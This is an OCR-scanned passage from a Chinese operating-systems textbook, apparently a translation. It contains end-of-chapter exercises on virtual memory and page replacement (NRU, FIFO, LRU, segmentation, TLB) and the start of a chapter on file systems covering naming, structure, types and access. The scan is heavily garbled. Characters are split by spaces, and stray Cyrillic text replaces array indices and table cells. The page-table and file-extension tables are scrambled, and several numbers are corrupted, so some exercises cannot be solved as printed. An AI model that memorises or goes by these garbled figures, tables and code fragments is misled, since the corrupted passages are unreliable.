时 间 和 每 个 页 的 R 位 和 M 位 如 下 所 示 “时间 以 

时 钟 滴答 为 单位 ) : 
页 面 | 装 入 时 间 | 上 次 访问 时 间 | 
0 126 | 280 | 
230 


м 
0 
01 
0 
1 


-| =| =| -| ә 


а) NRU 算 法 将 置换 哪个 页 面 ? 
b) FIFO 算 法 将 置换 哪个 页 面 ? 
c) LRU 算 法 将 置换 哪个 页 面 ? 
d 第 二 次 机 会 算法 将 置换 哪个 页 面 ? 
有 二 维 数组 : 
int Х[64][64]; 
假设 系统 中 有 4 个 页 框 ， 每 个 页 框 大 小 为 128 
个 字 (一 个 整数 占用 一 个 字 )。 处 理 数组 X 的 
程序 正好 可 以 放 在 一 页 中 ， 而 且 总 是 占用 0 号 
页 。 数 据 会 在 其 他 3 个 页 框 中 被 换 入 或 换 出 。 
数组 X 为 按 行 存储 ( 即 ， 在 内 存 中 ，X[0][0] 之 
后 是 X[0][1])。 下 面 两 段 代码 中 ， 哪 一 个 会 有 
最 少 的 缺 页 中 断 ? 请 解释 原因 ， 并 计算 缺 页 中 
断 的 总 数 。 
АВ: 
for (int j = 0; j < 64; j++) 

for (int i = 0; i < 64; i++) ХЦ = 0; 
ва: 
for (int i = 0; i < 64; i++) 

for (int j = 0; j < 64; j++) ХІ = 0; 
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30. PDP-1 是 最 早 的 分 时 计算 机 之 一 ， 有 4K 个 18 
位 字 的 内 存 。 在 每 个 时 刻 它 在 内 存 中 保持 一 
个 进程 。 当 调度 程序 决定 运行 另 一 个 进程 时 ， 
将 内 存 中 的 进程 写 到 一 个 换 页 磁 鼓 上 ， 磁 鼓 
的 表面 有 4K 个 18 位 字 。 磁 鼓 可 以 从 任何 字 开 
始 读 写 ， 而 不 仅仅 是 字 0。 请 解释 为 什么 要 选 
这 个 磁 鼓 ? 

' 一 台 计 算 机 为 每 个 进程 提供 65 536 字 节 的 地 址 
空间 , 这 个 地 址 空间 被 划分 为 4096 字 节 的 页 面 。 
一 个 特定 的 程序 有 327 68 字 节 的 正文 、16 386 
字 节 的 数据 和 15 870 字 节 的 堆栈 。 这 个 程序 能 
装 和 人 这 个 地 址 空间 吗 ? 如果 页 面 大 小 是 512 字 
节 ， 能 放 得 下 吗 ? 记 住 一 个 页 面 不 能 同时 包含 
两 个 不 同 段 的 成 分 。 

一 个 页 面 同一 时 刻 可 能 在 两 个 工作 集中 吗 ? 请 
解释 原因 。 

“人 们 已 经 观察 到 在 两 次 缺 页 中 断 之 间 执行 的 指 
令 数 与 分 配给 程序 的 页 框 数 直 接 成 比例 。 如 果 
可 用 内 存 加 倍 , 缺 页 中 断 间 的 平均 间隔 也 加 倍 。 
假设 一 条 普通 指令 需要 1hs， 但 是 如 果 发 生 了 
缺 页 中 断 就 需要 2001hs ( 即 2ms 处 理 缺 页 中 
№). 。 如 果 一 个 程序 运行 了 60s， 期 间 发 生 了 
15 000 次 缺 页 中 断 ， 如 果 可 用 内 存 是 原来 的 两 
倍 ， 那 么 这 个 程序 运行 需要 多 少时 间 ? 
Frugal 计 算 机 公司 的 一 组 操作 系统 设计 人 员 正 
在 考虑 在 他 们 的 新 操作 系统 中 减少 对 后 备 存储 
数量 的 需求 。 老 板 建议 根本 不 要 把 程序 正文 保 
“存在 交换 区 中 ， 而 是 在 需要 的 时 候 直接 从 二 进 
制 文件 中 调 页 进来 。 在 什么 条 件 下 (如 果 有 这 
样 的 条 件 话 ) 这 种 想法 适用 于 程序 文本 ? 在 什 
么 条 件 下 (如 果 有 这 样 的 条 件 话 ) 这 种 想法 适 
用 于 数据 ? 

有 一 条 机 器 语言 指令 将 要 被 调 人 ， 该 指令 可 把 
一 个 32 位 字 装 入 含有 32 位 字 地 址 的 寄存 器 。 这 
个 指令 可 能 引起 的 最 大 缺 页 中 断 次 数 是 多 少 ? 
像 在 MULTICS 中 那样 ， 当 同时 使 用 分 段 和 分 
页 时 ， 首 先 必须 查找 段 描述 符 ， 然 后 是 页 描 
述 符 。TLB 也 是 这 样 按 两 级 查找 的 方式 工作 
的 吗 ? 

一 个 程序 中 有 两 个 段 ， 段 0 中 为 指令 ， 段 1 中 为 
读 / 写 数据 。 段 0 有 读 / 执 行 保护 ， 段 1 有 读 / 写 保 
护 。 内 存 是 请 求 分 页 式 虚拟 内 存 系统 ， 它 的 虚 
拟 地 址 为 4 位 页 号 ，10 位 偏 移 量 。 页 表 和 保护 
如 下 所 示 ( 表 中 的 数字 均 为 十 进 制 ) : 


3 


32. 


3. 


© 


34. 


35. 


36. 


37. 


RO f ED 村 
读 /执行 Е] 

ENS ЖЕУ ЖДУ ДК 
0 [гус o TER 

1 | Ешй 1 м] 
1 11 2 9 
六 5 э С 
4 тй П (їл 

[ 在 磁盘 5 з] 
6 Sx 4 8 

7 з 7 | 12 | 


3: 


3 


4 


多 


9. 


对 于 下 面 的 每 种 情形 ， 或 者 给 出 动态 地 址 所 对 
应 的 实 (实际 ) 内 存 地 址 ， 或 者 指出 发 生 了 哪 
种 失效 ( 缺 页 中 断 ， 或 保护 错误 ) 。 

а) 读 取 页 : 段 1， 页 1 ， 偏 移 3， 

b) 存储 页 : 段 0， 页 0， 偏 移 16， 

с) 读 取 页 : 段 1， 页 4， 偏 移 28， 

d) 跳 转 到 : 段 1， 页 3， 偏 移 32。 


- 你 能 想象 在 哪些 情况 下 支持 虚拟 内 存 是 个 坏 想 


法 吗 ? 不 支持 虚拟 内 存 能 得 到 什么 好 处 呢 ? 请 
解释 。 

构造 一 个 柱状 图 ， 计 算 你 的 计算 机 中 可 执行 二 
进 制 文件 大 小 的 平均 值 和 中 间 值 。 在 Windows 
系统 中 ， 观 察 所 有 的 .exe 和 .dl 文件 ， 在 UNIX 
系统 中 ， 观 察 /bin、/usr/bin、/local/bin 目 录 下 
的 所 有 非 脚本 文件 的 可 执行 文件 (或 者 使 用 
file 工 具 来 查找 所 有 的 可 执行 文件 ) 。 确 定 这 台 
机 器 的 最 优 页 面 大 小 ， 只 考虑 代码 (不 包括 数 
据 ) 。 考 虑 内 部 碎片 和 页 表 大 小 ， 对 页 表 项 的 
大 小 做 出 合理 的 假设 。 假 设 所 有 的 程序 被 执行 
的 可 能 性 相同 ， 所 以 可 以 同等 对 待 。 


- MS 一 DOS 中 的 小 程序 可 以 编译 成 .COM 文 件 。 


这 些 文件 总 是 装载 到 0x100 地 址 的 一 个 内 存 段 ， 
这 个 内 存 段 用 作 代码 、 数 据 和 堆栈 。 转 移 执行 
的 控制 指令 (如 JMP、CALL) 和 访问 静态 数 
据 的 指令 把 地 址 编译 进 目标 代码 中 。 写 一 个 程 
序 重 定向 这 个 程序 文件 ， 使 之 可 以 在 任意 开始 
地 址 处 运行 。 读 者 的 程序 必须 扫描 代码 ， 寻 找 
指向 固定 内 存 地 址 的 目标 代码 ， 然 后 在 重 定向 
范围 内 修改 那些 指向 内 存单 元 的 地 址 。 可 以 在 
汇编 语言 程序 正文 中 找到 这 些 目标 地 址 。 注意， 
要 想 不 借 助 于 额外 的 信息 就 出 色 完 成 这 项 工作 
通常 是 不 可 能 的 ， 因 为 有 些 数据 字 的 值 和 指令 
目标 代码 相仿 。 


“编写 一 个 程序 ， 它 使 用 老化 算法 模拟 一 个 分 页 


系统 。 页 框 的 数量 是 参数 。 页 面 访问 序列 从 文 
件 中 读 取 。 对 于 一 个 给 定 的 输入 文件 ， 列 出 每 
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1000 个 内 存 访问 中 发 生 缺 页 中 断 的 数目 ， 它 是 
可 用 页 框 数 的 函数 。 

42. 编写 一 个 程序 ， 说 明 TLB 失 效 对 有 效 内 存 存 取 
时 间 的 影响 ， 内 存 存 取 时 间 可 以 用 计算 每 次 遍 
历 大 数组 时 的 读 取 时 间 来 衡量 。 

а) 解释 编程 思想 ， 并 描述 所 期 望 输出 如 何 展示 
一 些 实际 的 虚拟 内 存 体系 结构 。 

b) 运行 该 程序 ， 并 解释 运行 结果 与 你 的 预期 有 
何 出 入 。 

с) 在 一 台 更 古老 的 且 有 着 不 同体 系 结构 的 计算 
机 上 重复 b) ， 并 解释 输出 上 的 区 别 。 

43. 编写 一 个 程序 ， 该 程序 能 说 明 当 有 两 个 进程 的 
简单 情况 下 ， 使 用 局 部 页 置换 策略 和 全 局 页 置 
换 策略 的 差异 。 读 者 将 会 用 到 能 生成 一 个 基于 
统计 模型 的 页 面 访问 串 的 例 程 。 这 个 模型 有 N 


个 状态 ， 从 0 到 N-1， 代 表 每 个 可 能 的 页 面 访 

问 ， 每 个 状态 ;相关 的 概率 p, 代表 下 一 次 访问 仍 

指向 同一 页 面 的 几率。 否则 ， 下 一 次 页 面 访问 

将 以 等 概率 指向 其 他 任何 一 个 页 面 。 

а) 说 明 当 N 比 较 小 时 ， 页 面 访 问 串 生成 例 程 能 
运行 正常 。 

b) 对 有 一 个 进程 和 固定 数量 的 页 框 的 情况 计 
算 缺 页 中 断 率 。 解 释 这 种 结果 为 什么 是 正 
确 的 。 

c) 对 有 独立 页 面 访问 序列 的 两 个 进程 ， 以 及 
是 b) 中 页 框 数 两 倍 的 页 框 ， 重 复 b)。 

4) 用 全 局 策略 替换 局 部 策略 重复 c)。 类 似 地 ， 
使 用 局 部 策略 方法 ， 比 较 每 个 进程 缺 页 中 
断 率 。 


第 4 章 文件 系统 


所 有 的 计算 机 应 用 程序 都 需要 存储 和 检索 信息 。 进 程 运行 时 ， 可 以 在 它 自己 的 地 址 空间 存储 一 定量 
的 信息 ， 但 存储 容量 受 虚 拟 地 址 空间 大 小 的 限制 。 对 于 某 些 应 用 程序 ， 它 自己 的 地 址 空间 已 经 足够 用 
T: 但 是 对 于 其 他 一 些 应 用 程序 ， 例 如 航空 订 票 系统 、 银行 系统 或 者 公司 记 账 系统 ， 这 些 存储 空间 又 显 
得 太 小 了 。 

在 进程 的 地 址 空间 上 保存 信息 的 第 二 个 问题 是 : 进程 终止 时 ， 它 保存 的 信息 也 随 之 丢失 。 对 于 很 多 
应 用 (如 数据 库 ) 而 言 ， 有 关 信 息 必须 能 保存 几 星期 、 几 个 月 ， 其 至 永久 保留 。 在 使 用 信息 的 进程 终止 
时 ， 这 些 信息 是 不 可 以 消失 的 ， 甚 至 ， 即 使 是 系统 崩溃 致使 进程 消亡 了 ， 这 些 信 息 也 应 该 保存 下 来 。 

第 三 个 问题 是 : 经 常 需要 多 个 进程 同时 存 取 同 一 信息 (或 者 其 中 部 分 信息 )。 如 果 只 在 一 个 进程 的 
地 址 空间 里 保存 在 线 电话 短 ， 那 么 只 有 该 进程 才 可 以 对 它 进行 存 取 ， 也 就 是 说 一 次 只 能 查找 一 个 电话 号 
码 。 解 决 这 个 问题 的 方法 是 使 信息 本 身 独立 于 任何 一 个 进程 。 

因此 ， 长 期 存储 信息 有 三 个 基本 要 求 : 

1) 能 够 存储 大 量 信息 。 

2) 使 用 信息 的 进程 终止 时 ， 信 息 仍旧 存在 。 

3) 必须 能 使 多 个 进程 并 发 存 取 有 关 信息 。 

磁盘 (magnetic disk) 由 于 其 长 期 存储 的 性 质 ， 已 经 有 多 年 的 使 用 历史 。 磁 带 与 光盘 虽然 也 在 使 用 ， 
但 它们 的 性 能 很 低 。 我 们 将 在 第 5 章 学 习 更 多 有 关 磁 盘 的 知识 ， 但 目前 我 们 可 以 先 把 磁盘 当 作 一 种 固定 
块 大 小 的 线性 序列 ， 并 且 支 持 如 下 两 种 操作 ; 

1) 读 块 k， 

2) ЧЖК, 

事实 上 磁盘 支持 更 多 的 操作 ， 但 只 要 有 了 这 两 种 操作 ， 原则 上 就 可 以 解决 长 期 存储 的 问题 。 

不 过 ， 这 里 存在 着 很 多 不 便于 实现 的 操作 ， 特别 是 在 有 很 多 程序 或 者 多 用 户 使 用 着 的 大 型 系统 上 
(如 服务 器 )。 在 这 种 情况 下 ， 很 容易 产生 一 些 问题 ， 例 如 : 

1) 如 何 找到 信息 ? 

2) 如 何 防止 一 个 用 户 读 取 另 一 个 用 户 的 数据 ? 

3) 如 何 知道 哪些 块 是 空闲 的 ? 

就 像 我 们 看 到 的 操作 系统 提取 处 理 器 的 概念 来 建立 进程 的 抽象 ， 以 及 提取 物理 存储 器 的 概念 来 建立 
进程 (虚拟 ) 地 址 空间 的 抽象 那样 ， 我 们 可 以 用 一 个 新 的 抽象 一 文件 来 解决 这 个 问题 。 进程 (与 线程 )、 
地 址 空间 和 文件 ， 这 些 抽象 概念 均 是 操作 系统 中 最 重要 的 概念 。 如 果真 正 深入 理解 了 这 三 个 概念 ， 那 么 
读者 就 迈 上 了 成 为 一 个 操作 系统 专家 的 道路 。 

文件 是 进程 创建 的 信息 逻辑 单元 。 一 个 磁盘 一 般 含有 几 千 甚至 几 百 万 个 文件 ， 每 个 文件 是 独立 于 其 
他 文件 的 。 文 件 不 仅仅 被 用 来 对 磁盘 建 模 ， 以 替代 对 随机 存储 器 (КАМ) 的 建 模 ， 事 实 上 ， 如 果 能 把 
每 个 文件 看 成 一 种 地 址 空间 ， 那么 读者 就 离 理解 文件 的 本 质 不 远 了 。 

进程 可 以 读 取 已 经 存在 的 文件 ， 并 在 需要 时 建立 新 的 文件 。 存储 在 文件 中 的 信息 必须 是 持久 的 ， 也 
就 是 说 ， 不 会 因为 进程 的 创建 与 终止 而 受到 影响 。 一 个 文件 应 只 在 其 所 有 者 明确 删除 它 的 情况 下 才 会 消 
失 。 尽 管 读 写 文件 是 最 常见 的 操作 ， 但 还 存在 着 很 多 其 他 操作 ， 其 中 的 一 些 我 们 将 在 下 面 加 以 介绍 。 

文件 是 受 操作 系统 管理 的 。 有 关 文件 的 构造 、 命 名 、 存 取 、 使 用 、 保 护 、 实现 和 管理 方法 都 是 操作 
系统 设计 的 主要 内 容 。 从 总 体 上 看 ， 操 作 系统 中 处 理 文件 的 部 分 称 为 文件 系统 (file system) ， 这 就 是 本 
章 的 论题 。 

从 用 户 角 度 来 看 ， 文 件 系统 中 最 重要 的 是 它 在 用 户 眼中 的 表现 形式 ， 也 就 是 文件 是 由 什么 组 成 的 ， 
怎样 给 文件 命名 ， 怎 样 保护 文件 ， 以 及 可 以 对 文件 进行 哪些 操作 等 。 至 于 用 链表 还 是 用 位 图 来 记录 空闲 
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存储 区 以 及 在 一 个 逻辑 磁盘 块 中 有 多 少 个 扇 区 等 细节 并 不 是 用 户 所 关心 的 ， 当 然 对 文件 系统 的 设计 者 来 
说 这 些 内 容 是 相当 重要 的 。 正 因为 如 此 ， 本 章 将 分 为 几 节 讲述 ， 前 两 节 分 别 叙述 在 用 户 层面 的 关注 内 
容 一 -文件 和 目录 ， 随 后 是 有 关 文件 系统 实现 的 详细 讨论 ， 最 后 是 文件 系统 的 一 些 实例 。 


4.1 文件 
在 本 节 中 ， 我 们 从 用 户 角度 来 考察 文件 ， 也 就 是 说 ， 用 户 如 何 使 用 文件 ， 文 件 具有 哪些 特性 。 
4.1.1 文件 命名 


文件 是 一 种 抽象 机 制 ， 它 提供 了 一 种 在 磁盘 上 保留 信息 而 且 方 便 以 后 读 取 的 方法 。 这 种 方法 可 以 使 
用 户 不 用 了 解 存储 信息 的 方法 、 位 置 和 实际 磁盘 工作 方式 等 有 关 细 节 。 

也 许 任何 一 种 抽象 机 制 的 最 重要 的 特性 就 是 对 管理 对 象 的 命名 方式 ， 所 以 ， 我 们 将 从 对 文件 的 命名 
开始 考察 文件 系统 。 在 进程 创建 文件 时 ， 它 给 文件 命名 。 在 进程 终止 时 ， 该 文件 仍旧 存在 ， 并 且 其 他 进 
程 可 以 通过 这 个 文件 名 对 它 进行 访问 。 

文件 的 具体 命名 规则 在 各 个 系统 中 是 不 同 的 ， 不 过 所 有 的 现代 操作 系统 都 允许 用 1 至 8 个 字母 组 成 的 
字符 串 作为 合法 的 文件 名 。 因 此 ，andrea、bruce 和 cathy 都 是 合法 文件 名 。 通 常 ， 文 件 名 中 也 人 允许 有 数字 
和 一 些 特殊 字符 ， 所 以 像 2、urgent! 和 Fig.2-14 也 是 合法 的 。 许 多 文件 系统 支持 长 达 255 个 字符 的 文件 名 。 

有 的 文件 系统 区 分 大 小 写字 母 ， 有 的 则 不 区 分 。UNIX 是 前 一 类 ，MS-DOS 是 后 一 类 。 所 以 在 UNIX 
系统 中 maria、Maria 和 MARIA 是 三 个 不 同 的 文件 ， 而 在 MS-DOS 中 ， 它 们 是 同一 个 文件 。 

关于 文件 系统 在 这 里 需要 插 一 句 ，Windows 95 与 Windows 98 用 的 都 是 MS-DOS 的 文件 系统 ， 即 FAT- 
16， 因 此 继承 了 其 很 多 性 质 ， 例 如 有 关 文件 名 的 构造 方法 。Windows 98 对 FAT-16 引 入 了 一 些 扩展 ， 从 而 
成 为 FAT-32， 但 这 两 者 是 很 相似 的 。 并 且 ，Windows NT、Windows 2000、Windows XP 和 Windows Vista 
支持 这 两 种 已 经 过 时 的 FAT 文 件 系统 。 这 4 个 基于 NT 的 操作 系统 有 着 一 个 自 带 文件 系统 (NTFS), CHA 
很 多 不 同 的 性 质 (例如 基于 Unicode 的 文件 名 )。 在 本 章 中 ， 当 提 到 MS-DOS 或 FAT 文 件 系 统 的 时 候 ， 我 们 
指 的 是 用 在 Windows 上 的 FAT-16 和 FAT-32， 除 非特 别 指明 。 我 们 将 晚 一 些 在 这 章 讨论 FAT 文 件 系统 ， 并 在 
第 11 章 讨论 NTFS， 并 细致 地 分 析 了 一 


Windows Vista, | 扩展 名 |  _ а 义 РЫЗ 
。 [Raak | 省份 文件 
许多 操作 系统 支持 文件 名 用 加 点 Ке бету OO кнн 
陋 开 分 为 两 部 分 ， 如 文件 名 prog.c。 轩 [neg | аала ВИП 


点 后 面 的 部 分 称 为 文件 扩展 名 (file [fienhip 帮助 文件 

extension) ， 文 件 扩展 名 通常 表示 文件 fenmi | WWwW 超 文本 标记 语言 文档 
的 一 些 信息 ， 如 MS-DOS 中 ,文件 名 [Mejo | 符合 JPEG 编 码 标准 的 静态 图 片 
由 1 至 8 个 字符 以 及 1 至 3 个 字符 的 可 选 | fie.mp3 符合 MP3 音 频 编码 格式 的 音乐 文件 


扩展 名 组 成 。 在 UNIX 里 ， 如 果 有 扩展 [femo | 符合 MPEG 编 码 标 准 的 电影 


名 ， 则 扩展 名 长 度 完全 由 用 户 决定 ， ло Eert Armans. иы 

一 个 文件 甚至 可 以 包含 两 个 或 更 多 的 ca нен 

扩展 名 。 如 homepage-html.zip, X | цеде 为 TEX 格 式 化 程序 淮 备 的 输入 文件 _ 

里 .html 表 明 HTML 格 式 的 一 个 Web 页 [fie 一 般 正文 文件 > | 
面 ，.zip 表 示 该 文件 (homepage.html) [Шер | 压缩 文件 == 

已 经 采用 zip 程 序 压缩 过 。 一 些 常用 文 

件 扩展 名 及 其 含义 如 图 4-1 所 示 。 кы ашчы 


在 某 些 系统 中 (如 UNIX)， 文件 扩展 名 只 是 一 种 约定 ， 操 作 系统 并 不 强迫 采用 它 。 名 为 file.txt 的 文 
件 也 许 是 文本 文件 ， 这 个 文件 名 在 于 提醒 所 有 者 ， 而 不 是 表示 传送 什么 信息 给 计算 机 。 但 是 另 一 方面 ， 
C 编 译 器 可 能 要 求 它 编译 的 文件 以 < 结尾 ， 否 则 它 会 拒绝 编译 。 

对 于 可 以 处 理 多 种 类 型 文件 的 某 个 程序 ， 这 类 约定 是 特别 有 用 的 。 例 如 ，C 编 译 器 可 以 编译 、 连 接 
多 种 文件 ， 包 括 C 文 件 和 汇编 语言 文件 。 这 时 扩展 名 就 很 必要 ， 编 译 器 利用 它 区 分 哪些 是 C 文 件 ， 哪 些 
是 汇编 文件 ， 哪 些 是 其 他 文件 。 

相反 ，Windows 对 扩展 名 赋予 含义 。 用 户 ( 或 进程 ) 可 以 在 操作 系统 中 注册 扩展 名 ， 并 且 规 定 哪 个 
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程序 “拥有 ”该 扩展 名 。 当 用 户 双击 某 个 文件 名 时 ,“ 拥 有 ”该 文件 扩展 名 的 程序 就 启动 并 运行 该 文件 。 
例如 ， 双 击 file.doc 启 动 了 Microsoft Word 程 序 ， 并 以 file.doc 作 为 待 编辑 的 初始 文件 。 
4.1.2 文件 结构 
文件 可 以 有 多 种 构造 方式 ， 在 图 4-2 中 列 出 了 常用 的 三 种 方式 。 图 4-2a 中 的 文件 是 一 种 无 结构 的 字 
节 序列 ， 操 作 系 统 事 实 上 不 知道 也 不 关心 文件 内 容 是 什么 ， 操 作 系 统 所 见 到 的 就 是 字 节 ， 其 任何 含义 只 
在 用 户 程序 中 解释 。 在 UNIX 和 Windows 中 都 采用 这 种 方法 。 
! 个 字 节 1 个 记录 


а) b) c) 
图 4-2 三 种 文件 结构 : a) 字 节 序列 ，b) 记录 序列 ，c) 树 


把 文件 看 成 字 节 序列 为 操作 系统 提供 了 最 大 的 灵活 性 。 用 户 程序 可 以 向 文件 中 加 入 任何 内 容 ， 并 以 
任何 方便 的 形式 命名 。 操 作 系 统 不 提供 任何 帮助 ， 但 也 不 会 构成 阻碍 。 对 于 想 做 特殊 操作 的 用 户 来 说 ， 
后 者 是 非常 重要 的 。 所 有 UNIX、MS-DOS 以 及 Windows 都 采用 这 种 文件 模型 。 

图 4-2b 表 示 在 文件 结构 上 的 第 一 步 改 进 。 在 这 个 模型 中 ， 文 件 是 具有 固定 长 度 记录 的 序列 ， 每 个 记 
录 都 有 其 内 部 结构 。 把 文件 作为 记录 序列 的 中 心思 想 是 ; 读 操作 返回 一 个 记录 ， 而 写 操作 追加 一 
个 记录 。 这 里 对 “记录 ”给 予 一 个 历史 上 的 说 明 ， 几 十 年 前 ， 当 80 列 的 穿孔 卡片 还 是 主流 的 时 候 ， 很 多 
(大 型 机 ) 操作 系统 把 文件 系统 建立 在 由 80 个 字符 的 记录 组 成 的 文件 基础 之 上 。 这 些 操作 系统 也 支持 132 
个 字符 的 记录 组 成 的 文件 ， 这 是 为 了 适应 行 式 打 印 机 (当时 的 行 式 打印 机 有 132 列 宽 )。 程 序 以 80 个 字符 
为 单位 读 和 人 数据 ， 并 以 132 个 字符 为 单位 写 数据 ， 其 中 后 面 52 个 字符 都 是 空格 。 现 在 已 经 没有 以 这 种 方 
式 工作 的 通用 系统 了 ， 但 是 在 80 列 穿孔 卡片 和 132 列 宽 行 式 打印 机 流行 的 日 子 里 ， 这 是 大 型 计算 机 系统 
中 的 常见 模式 。 

第 三 种 文件 结构 如 图 4-2c 所 示 。 文 件 在 这 种 结构 中 由 一 棵 记录 树 构成 ， 每 个 记录 并 不 具有 同样 的 长 
度 ， 而 记录 的 固定 位 置 上 有 一 个 “ 键 ”字段 。 这 棵 树 按 “ 键 ”字段 进行 排序 ， 从 而 可 以 对 特定 “ 键 ” 进 
行 快速 查找 。 

虽然 在 这 类 结构 中 取 “ 下 一 个 ”记录 是 可 以 的 ,但 是 基本 操作 并 不 是 取 “ 下 一 个 ”记录 ， 而 是 获得 
具有 特定 键 的 记录 。 如 图 4-2c 中 的 文件 z00， 用 户 可 以 要 求 系统 取 键 为 pony 的 记录 ， 而 不 必 关 心 记录 在 
文件 中 的 确切 位 置 。 进 而 ， 可 以 在 文件 中 添加 新 记录 。 但 是 ， 把 记录 加 在 文件 的 什么 位 置 是 由 操作 系统 
而 不 是 用 户 决定 的 。 这 类 文件 结构 与 UNIX 和 Windows 中 采用 的 无 结构 字 节 流明 显 不 同 ， 但 它 在 一 些 处 
理 商 业 数 据 的 大 型 计算 机 中 获得 广泛 使 用 。 


4.1.3 文件 类 型 

很 多 操作 系统 支持 多 种 文件 类 型 。 如 UNIX 和 Windows 中 都 有 普通 文件 和 目录 ，UNIX 还 有 字符 特殊 
文件 (character special file) 和 块 特殊 文件 (block special file)。 普 通 文件 (regular file) 中 包含 有 用 户 
信息 。 图 4-2 中 的 所 有 文件 都 是 普通 文件 。 目 录 (directory) 是 管理 文件 系统 结构 的 系统 文件 ， 将 在 以 后 
的 章节 中 讨论 。 字 符 特殊 文件 和 输入 /输出 有 关 ， 用 于 串 行 UO 类 设备 ， 如 终端 、 打 印 机 、 网 络 等 。 块 特 
殊 文件 用 于 磁盘 类 设备 。 本 章 主要 讨论 普通 文件 。 

普通 文件 一 般 分 为 ASCI 文 件 和 二 进 制 文件 。ASCI[ 文 件 由 多 行 正 文 组 成 。 在 某 些 系统 中 ， 每 行 用 
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回 车 符 结束 ， 其 他 系统 则 用 换行 符 结束 。 有 些 系统 还 同时 采用 回 车 符 和 换行 符 ( 如 MS-DOS)。 文 件 中 
各 行 的 长 度 不 一 定 相同 。 

ASCII 文 件 的 最 大 优势 是 可 以 显示 和 打印 ， 还 可 以 用 任何 文本 编辑 器 进行 编辑 。 再 者 ， 如 果 很 多 程序 
都 以 ASCII 文 件 作为 输入 和 输出 ， 就 很 容易 把 一 个 程序 的 输出 作为 另 一 个 程序 的 输入 ， 如 shell 管 道 一 样 。 
(用 管道 实现 进程 间 通 信 并 非 更 容易 ， 但 若 以 一 种 公认 的 标准 (如 ASCI 码 ) 来 表示 ， 则 更 易于 理解 一 些 。) 

其 他 与 ASCII 文 件 不 - 进 制 文件 。 打 印 出 来 的 二 进 制 文件 是 无 法 理解 的 、 充 满 混乱 字符 的 一 
张 表 。 通 常 ， 二 进 制 文件 有 一 定 的 内 部 结构 ， 使 用 该 文件 的 程序 才 了 解 这 种 结构 。 

如 图 4-3a 是 一 个 简单 的 可 执行 二 进 制 文件 ， 它 取 自 某 个 版 本 的 UNIX。 尽 管 这 个 文件 只 是 一 个 字 节 
序列 ， 但 只 有 文件 的 格式 正确 时 ， 操 作 系统 才 会 执行 这 个 文件 。 这 个 文件 有 五 个 段 : 文件 头 、 正 文 、 数 
据 、 重 定位 位 及 符号 表 。 文 件 头 以 所 谓 的 度数 (magic number) 开始 ， 表 明 该 文件 是 一 个 可 执行 的 文件 
(防止 非 这 种 格式 的 文件 偶然 运行 )。 魔 数 后 面 是 文件 中 各 段 的 长 度 、 执 行 的 起 始 地 址 和 一 些 标志 位 。 程 
序 本 身 的 正文 和 数据 在 文件 头 后 面 。 这 些 被 装 和 内存， 并 使 用 重 定位 位 重新 定位 。 符 号 表 则 用 于 调试 。 


ЖИ 模块 名 称 
正文 长 度 B 


数据 长 度 日 其 
x BSS 长 度 
Б 符号 表 长 度 目标 模块 | 所 有 者 | 
一 和 on 一] 保护 
大 小 


数据 7 模块 头 
重 定位 位 
月 标 模块 
符号 表 
а) b) 


图 4-3 a) 一 个 可 执行 文件 ，b) 一 个 存档 文件 


二 进 制 文件 的 第 二 个 例子 是 UNIX 的 存档 文件 ， 它 由 已 编译 但 没有 连接 的 库 过 程 (模块 ) 集合 而 成 。 
每 个 文件 以 模块 头 开始 ， 其 中 记录 了 名 称 、 创 建 日 期 、 所 有 者 、 保 护 码 和 文件 大 小 。 该 模块 头 与 可 执行 
文件 一 样 ， 也 都 是 二 进 制 数字 ， 打 印 输出 它们 毫 无 意义 。 

所 有 操作 系统 必须 能 够 识别 它们 自己 的 可 执行 文件 的 文件 类 型 ， 其 中 有 些 操作 系统 还 可 识别 更 多 的 
信息 。 一 种 老式 的 TOPS-20 操 作 系 统 (用 于 DECsystem20 计 算 机 ) 甚至 可 检查 可 执行 文件 的 创建 时 间 ， 
然后 ， 它 可 以 找到 相应 的 源 文件 ， 看 它 在 二 进 制 文 件 生成 后 是 否 被 修改 过 。 如 果 修 改过 ， 操 作 系统 自动 
重新 编译 这 个 文件 。 在 UNIX 中 ， 就 是 在 shell 中 做 入 make 程 序 。 这 时 操作 系统 要 求 用 户 必须 采用 固定 的 
文件 扩展 名 ， 从 而 确定 哪个 源 程序 生成 哪个 二 进 制 文 件 。 

如 果 用 户 执行 了 系统 设计 者 没有 考虑 到 的 某 种 操作 ， 这 种 强制 类 型 的 文件 有 可 能 会 引起 麻烦 。 比 如 
在 一 个 系统 中 ， 程 序 输出 文件 的 扩展 名 是 .dat (数据 文件 )， 若 用 户 写 一 个 格式 化 程序 ， 读 入 .c (CEF) 
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文件 并 转换 它 (比如 把 该 文件 转换 成 标准 的 首 行 缩 进 ) ， 再 把 转换 后 的 文件 以 .dat 类 型 输出 。 如 果 用 户 试 
图 用 C 编 译 器 来 编译 这 个 文件 ， 因 为 文件 扩展 名 不 对 ，C 编 译 器 会 拒绝 编译 。 若 想 把 file.dat 复 制 到 file.c 
也 不 行 ， 因 为 系统 会 认为 这 是 无 效 的 复制 (防止 用 户 错误 )。 

尽管 对 初学 者 而 言 ， 这 类 “保护 ”是 有 利 的 ， 但 一 些 有 经 验 的 用 户 却 感 到 很 烦恼 ， 因 为 他 们 要 花 很 
多 精力 来 适应 操作 系统 对 合理 和 不 合理 操作 的 划分 。 
4.1.4 文件 存 取 

早期 操作 系统 只 有 一 种 文件 存 取 方 式 : 顺序 存 取 (sequential access)。 进 程 在 这 些 系统 中 可 从 头 顺 
序 读 取 文 件 的 全 部 字 节 或 记录 ， 但 不 能 跳 过 某 一 些 内容 ， 也 不 能 不 按 顺 序 读 取 。 顺 序 存 取 文件 是 可 以 返 
回 到 起 点 的 ， 需 要 时 可 多 次 读 取 该 文件 。 在 存储 介质 是 磁带 而 不 是 磁盘 时 ， 顺 序 存 取 文件 是 很 方便 的 。 

当 用 磁盘 来 存储 文件 时 ， 我 们 可 以 不 按 顺 序 地 读 取 文 件 中 的 字 节 或 记录 ， 或 者 按照 关键 字 而 不 是 位 
置 来 存 取 记录 。 这 种 能 够 以 任何 次 序 读 取 其 中 字 节 或 记录 的 文件 称 作 随机 存 取 文 件 (random access file) 。 
许多 应 用 程序 需要 这 种 类 型 的 文件 。 

随机 存 取 文 件 对 很 多 应 用 程序 而 言 是 必 不 可 少 的， 如 数据 库 系 统 。 如 果 乘 客 打 电话 预订 某 航班 机 票 ， 
订 票 程序 必须 能 直接 存 取 该 航班 记录 ， 而 不 必 先 读 出 其 他 航班 的 成 千 上 万 个 记录 。 

